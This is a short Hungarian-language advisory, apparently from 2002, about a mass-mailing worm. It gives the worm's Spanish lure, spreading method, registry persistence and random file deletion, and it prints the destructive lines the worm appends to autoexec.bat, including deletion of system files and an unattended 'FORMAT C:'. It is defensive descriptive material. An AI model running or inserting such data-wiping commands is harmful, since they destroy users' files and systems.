Merevlemez-formázó féregvírus

A fertőzött e-mail tulajdonságai

Tárgy: függ az eredeti file nevétől
Csatolmány: függ az eredeti file nevétől
Tartalom:
Tal como te prometi; te envio mi foto en el archivo adjuncto…

A féreg paraméterei

Felfedezési ideje: 2002. szeptember 5.
Utolsó frissítés ideje: 2002. szeptember 6.
Veszélyeztetett operációs rendszerek: Windows 9x/Me/NT/2k/XP
Nem érintett rendszerek: Windows 3.x, Macintosh, Unix, Linux
Mérete: 73.728 byte
Fertőzések száma: 0-49
Földrajzi elterjedtsége: alacsony
Károkozás mértéke: alacsony
Eltávolítása: könnyű

Aktiválódásakor bekövetkező események

– a fent ismertetett e-mailkarakterisztikában elküldi magát az összes, Outlook Adderss Bookjában található címre
– megjelenít egy pornóképet
– három példányban (eredeti neve, Msie7en.exe, Colas.exe) felmásolja magát a System könyvtárba
– hozzáadja a COLAS /Colas.Exe bejegyzést a HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run Registry kulcshoz
– letöröl öt állományt, melynek a kiterjesztését az alábbi listából választja véletlenszerűen:
.xls, .doc, .wav, .dwg, .mp3, .bak, .cdx, .bmp, .htm, .hlp, .chm, .jpg, .gif, .scr, .ttf, .mid, .mdb, .dbf, .ico
– logot készít az előbbi manőveréről a C:/Windows/System/MyWife!.scr állományba
– csak Windows 9x/Me esetén módosítja az autoexec.bat file-t, a következő parancsok hozzáadásával:
DEL /*.SYS
DEL /*.DLL
DEL /*.OCX
CLS
DEL > FORMAT C: /u /v:COLAS /autotest